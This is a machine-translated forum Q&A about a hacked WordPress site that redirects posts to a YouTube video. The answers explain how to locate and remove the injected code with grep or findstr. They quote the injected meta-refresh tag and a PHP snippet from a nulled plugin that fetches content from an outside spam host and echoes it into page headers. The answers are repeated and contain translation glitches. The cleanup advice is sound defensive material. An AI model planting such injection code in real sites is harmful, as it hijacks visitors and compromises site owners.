Tags Wordpress网站帖子被重定向到Youtube视频

我在wordpress网站上遇到了一个大问题。有人入侵并在下面给出的某个地方插入了这个元标记

<meta http-equiv="refresh" content="0; url=http://www.youtube.com/watch?v=RFngSCaY5nA">    

由于这个代码，我的网站帖子被重定向到贾斯汀·比伯的youtube视频上。现在我无法找到该代码的位置以及如何删除它

---

在此问题上的任何帮助都将不胜感激。

我找到了解决方案，请检查您的网站和所有文件中的小代码并将其删除

---

来源：

我找到了解决方案，检查您的站点和所有文件中的小代码并将其删除

---

来源：

如果您在Mac电脑和许多其他电脑上使用了默认的grep，但在pc上没有，您可以使用终端中有用的小命令检查文件夹。对于pc，请使用findstr或下载grep。如果您无法在本地访问这些文件，请下载它们或使用ssh/telnes远程访问它们

我使用的grep命令是：

grep -nr 'http://spamcheckr.com/l.php' /www/mysite/wp-content

不要忘记将/www/mysite/wp内容更改到wordpress站点的位置

在grep中使用-nr选项，它将输出代码所在的文件夹和文件的精确行

个人电脑：

findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content

不幸的是，它可能会告诉你它在第一行，但当你打开文件时，你会注意到它是一个压缩文件，大约有250行长。不过没问题。只要在打开语法突出显示的任何文本编辑器中打开它，并查找以下代码：

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}

它将是唯一突出显示的代码，而所有其他代码将保持灰色，因为它只是用来欺骗您，实际上并没有做任何事情。然后可以删除该代码

您可能还想首先检查是谁添加了该文件，因此只需使用与上面使用的相同的grep命令，而是使用发现恶意代码的文件名。因此，如果文件名为includes/settings.php，请在命令行中运行以下命令：

grep -nr 'includes/settings.php' /www/mysite/wp-content

该文件很可能包含在插件root或theme functions.php的主php脚本中

它看起来像这样

包括“includes/settings.php”

如果文件都是垃圾代码，那么删除该行是安全的。我也会浏览该页面，看看是否添加了任何可疑的内容

你最安全的选择是完全停止使用该插件，但如果你真的需要它，你可以运行一些在线病毒检查程序，或者只是查看该插件以获得额外的安全性

大多数情况下，这些插件来自wplocker/themeok.org等网站或其他声称免费提供高级插件的网站。底线是，这太好了，不可能是真的，他们想要敲诈你，所以要么付钱给他们，要么准备让他们和你作对

---

顺便说一句，它可能还做了其他事情，所以我会采取一些其他的安全措施，然后修复youtube黑客。

如果你在Mac和其他很多电脑上有grep默认值，但在pc上没有，你可以在终端上使用一个有用的小命令来检查你的文件夹。对于pc，使用findstr或下载grep。如果您无法在本地访问这些文件，请下载它们或使用ssh/telnes远程访问它们

我使用的grep命令是：

grep -nr 'http://spamcheckr.com/l.php' /www/mysite/wp-content

不要忘记将/www/mysite/wp内容更改到wordpress站点的位置

在grep中使用-nr选项，它将输出代码所在的文件夹和文件的精确行

个人电脑：

findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content

不幸的是，它可能会告诉你它在第一行，但当你打开文件时，你会注意到它是一个压缩文件，大约有250行长。不过没问题。只要在打开语法突出显示的任何文本编辑器中打开它，并查找以下代码：

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}

它将是唯一突出显示的代码，而所有其他代码将保持灰色，因为它只是用来欺骗您，实际上并没有做任何事情。然后可以删除该代码

您可能还想首先检查是谁添加了该文件，因此只需使用与上面使用的相同的grep命令，而是使用发现恶意代码的文件名。因此，如果文件名为includes/settings.php，请在命令行中运行以下命令：

grep -nr 'includes/settings.php' /www/mysite/wp-content

该文件很可能包含在插件root或theme functions.php的主php脚本中

它看起来像这样

包括“includes/settings.php”

如果文件都是垃圾代码，那么删除该行是安全的。我也会浏览该页面，看看是否添加了任何可疑的内容

你最安全的选择是完全停止使用该插件，但如果你真的需要它，你可以运行一些在线病毒检查程序，或者只是查看该插件以获得额外的安全性

大多数情况下，这些插件来自wplocker/themeok.org等网站或其他声称免费提供高级插件的网站。底线是，这太好了，不可能是真的，他们想敲诈你，所以要么付钱，要么是真的 让他们和你上床

---

顺便说一句，它可能还做了其他事情，所以我会采取一些其他安全措施，然后修复youtube黑客。

尝试下载一份主题副本，并使用类似notepadd++的程序搜索所有这些文件中的链接，然后将其删除。您可以尝试使用“查找并替换”插件替换该链接的所有实例使用空白字符串链接。如果你的网站被黑客入侵，删除该代码仍然会使你容易受到黑客的回访。检查这个线程。我也有同样的问题,；在header.php文件中搜索，可能存在。或者你可以下载你的主题，搜索并替换@Howlin say。试着下载一份你的主题副本，然后使用notepadd++之类的程序在所有这些文件中搜索该链接并将其删除。你可以尝试使用“查找并替换”插件将该链接的所有实例替换为空白字符串。如果你的网站被黑客入侵，删除该代码仍然会使你容易受到黑客的回访。检查这个线程。我也有同样的问题,；在header.php文件中搜索，可能存在。或者你也可以下载你的主题，搜索并替换类似的@Howlin-say。